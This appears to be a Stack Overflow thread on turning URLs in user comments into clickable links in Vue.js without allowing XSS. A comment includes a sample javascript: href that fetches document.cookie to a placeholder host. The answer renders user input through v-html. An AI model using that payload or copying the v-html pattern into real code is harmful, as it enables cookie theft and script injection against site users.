# Display links as <a> tags but don't allow other tags?

Tags: javascript, html, vue.js, xss

So, I am using `Vue.js` and want to display some text that contains links. The text is input by the users.

Example:

**This is a site www.example.com which is better than www.oldexample.com**

I want it to appear as:

**This is a site [www.example.com](http://www.example.com) which is better than [www.oldexample.com](http://www.oldexample.com)**

So, I want the links to be hyperlinked. The problem is that this is user input, so it has to be XSS protected. I currently display it as text, so I can't use HTML tags in it. If I were to use `v-html` and wrap all links in `a` tags it would be too unsafe as users could enter any `HTML`.

I was thinking about splitting the string by URLs, and wrapping every part that is not a link in a `span` tag and every link in a `a` tag. But this seems a bit too much processing to be done just to hyperlink the URLs.

Is there a simpler method for this, that is XSS safe (users can't enter other tags except of `<a>`) ?

Comment: Check this: http://stackoverflow.com/questions/1500260/detect-urls-in-text-with-javascript

Comment: Are you trying to replace user-input text as the user types it, or in another place on the page? In-place replacement is a little tricky, you probably want a library that can tokenize the input to support things like backspace removing the hyperlink (think of how Word/Outlook do this with hyperlinks in text). By XSS protected do you mean users potentially entering link text like www.gmail.com that actually has a href of www.steal-my-password.io ?

Comment: It's not in-place. I have a comment section, and I want to make links clickable.

Comment: @AndrewLyndem Yes, that wraps links in `<a>` tags, but my question is not actually how to do that. But how to output that `HTML` so other tags aren't allowed and stop `XSS` from being a problem. If I were to use jQuery I could use `$.text()` or `$.html()`. If I use `text()` the a tags won't work, if I use `html()` any tag will be interpreted as `HTML`.

Comment: could you use `element.innerHMTL ="<a href='" + url + "'> " + user input +" </a>"` ? or would this not work for some reason?

Comment: @ZoeCarver There can be multiple URLs in a single comment.

Comment: could you use an if statement? or the `.split(" ");` method?

Comment: sure, you understand, that links is one of most dangerous elements in XSS context. Urls should be filtered to be `http/https` at least

Comment: @vp_arth I know, but the link will be displayed entirely to the user so he can decide himself if he will click it or not. Having a dodgy button or script tag inserted is more dangerous for the users I think.

Comment: I mean to filter something like this `href="javascript:fetch('goo.gl/xxxx?'+document.cookie)"`, user should not to decide click it or not.

Comment: Well, the user would see: `javascript:fetch('goo.gl/xxxx?'+document.cookie)` as the link text. The href will always be equal to the link text.

Answer (score 3):

Use [vue-linkify](https://github.com/phanan/vue-linkify) it create a `v-linkified` directive that do exactly what you need

```js
new Vue({
  el:'#app',
  data:{
    input:'Hello from vuejs.org'
  }
})
```

```html
<div id="app">
  <input v-model="input"/>

  <div v-html="input" v-linkified>
  </div>

</div>
```

Comment: Do you know whether it renders HTML as HTML or text?

Comment: But it has the `v-html="input"` directive, so it means that the entire input will be `HTML` or only the `a` tags?

Comment: vue-linkify "eats" all tags, with script it throws errors.